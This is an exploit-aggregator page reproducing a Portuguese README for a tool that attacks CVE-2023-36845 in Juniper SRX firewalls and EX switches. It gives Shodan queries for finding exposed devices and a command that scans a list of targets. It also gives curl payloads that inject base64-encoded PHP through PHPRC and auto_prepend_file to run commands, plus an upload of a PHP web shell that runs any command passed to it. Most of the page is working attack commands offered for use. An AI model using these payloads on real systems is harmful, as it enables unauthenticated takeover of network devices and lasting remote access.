Sploitus

Juniper-exploit

kitploit · 2026-08-26

Exploit Code

MARKDOWN78 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CHARONDEFALT-JUNIPER-EXPLOIT-CVE-2023-36845
# CVE-2023-36845

![](https://assets.kitploit.com/production/public/readmes/15971/773b29361aa78930b857cb0c60bfc3835b459fe46a84af1b7933ea08e018efd4.png)

## Descrição

CVE-2023-36845 representa uma notável vulnerabilidade de manipulação de variáveis de ambiente PHP que afeta firewalls Juniper SRX e switches EX. Embora a Juniper tenha classificado esta vulnerabilidade como de gravidade média, neste artigo, vamos elucidar como esta única vulnerabilidade pode ser aproveitada para execução remota de código não autenticada.

## Pesquisa - Shodan

root@kitploit:~
    
    
    title:"Juniper Web Device Manager"
    

![image](https://assets.kitploit.com/production/public/readmes/15971/381509718df2f3bb0aa6e4d3f8a55d5576a52801fa35bfe60c7765c2e6fb6a57.png)

root@kitploit:~
    
    
    title:"Juniper" http.favicon.hash:2141724739
    

![image](https://assets.kitploit.com/production/public/readmes/15971/aabb8464e7e1cba75d17be8ebe9a0ffd7d5781aaad38fec18ae7d9881b71eeb4.png)

## Uso 🛠

Detecção

root@kitploit:~
    
    
    python3 CVE-2023-36845.py -f targets.txt -o output.txt
    

## RCE 🧨

### Opção 1

É viável utilizar qualquer wrapper de protocolo em conjunto com `auto_prepend_file`. A escolha mais adequada para esta operação é o protocolo `data://`, que permite fornecer o "arquivo secundário" inline. Aqui está uma representação sofisticada deste exploit, executando o `<? phpinfo(); ?>` embutido no esquema `data://`:

root@kitploit:~
    
    
    curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
    

Execute o comando `whoami`

`<?php shell_exec('whoami'); ?>`

root@kitploit:~
    
    
    curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
    

### Opção 2

Carregar um arquivo

`<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>`

root@kitploit:~
    
    
    $ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
    ", "csize": 110}]'
    

## Parâmetros 🧰

Parâmetro| Descrição| Tipo  
---|---|---  
\--file / -f| Arquivo de alvos de entrada| Arquivo  
-o| Arquivo de saída| Arquivo